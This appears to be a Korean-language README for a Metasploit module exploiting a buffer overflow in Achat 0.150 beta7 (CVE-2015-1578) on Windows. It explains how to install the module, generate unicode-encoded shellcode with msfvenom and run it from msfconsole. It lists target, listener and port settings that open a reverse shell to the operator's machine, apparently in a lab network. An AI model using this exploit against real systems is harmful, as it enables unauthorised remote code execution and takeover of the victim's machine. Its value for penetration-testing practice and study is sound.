이것은 Windows에서 Achat 0.150 beta7의 버퍼 오버플로 취약점(CVE-2015-1578)을 대상으로 하는 개념 증명 Metasploit 모듈 익스플로잇입니다. 악용 시 조작된 UDP 패킷을 통해 원격 코드 실행이 가능합니다.
이 모듈은 Windows의 Achat 0.150 beta7에서 발생하는 버퍼 오버플로우 취약점 CVE-2015-1578을 위한 Metasploit 모듈입니다. 조작된 UDP 패킷을 통해 원격 코드 실행이 가능합니다.
이 모듈은 깔끔하고 최소화된 잘 구조화된 Metasploit 익스플로잇 개발 예제 역할을 하도록 설계되었습니다. 다음을 보여줍니다:
msfvenom을 통한 동적 유니코드 인코딩 셸코드 생성$PATH에 포함된 msfvenommsfvenom을 사용하여 x86/unicode_mixed 인코딩 및 사용자 지정 배드 문자로 페이로드 생성./install.sh
그런 다음 Metasploit을 실행하고 다음을 실행합니다:
reload_all
use exploit/windows/yaldobaoth/achat_bof
RHOSTS – 대상 IP 주소 (필수)LHOST – 리버스 셸을 위한 로컬 호스트 IP (필수)LPORT – 리버스 셸을 위한 로컬 포트 (기본값: 4444)RPORT – 대상의 원격 UDP 포트 (기본값: 9256)msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
다음 작업을 수행합니다:
msfvenom으로 유니코드 호환 리버스 셸 페이로드 생성LHOST:LPORT에서 셸 수신 대기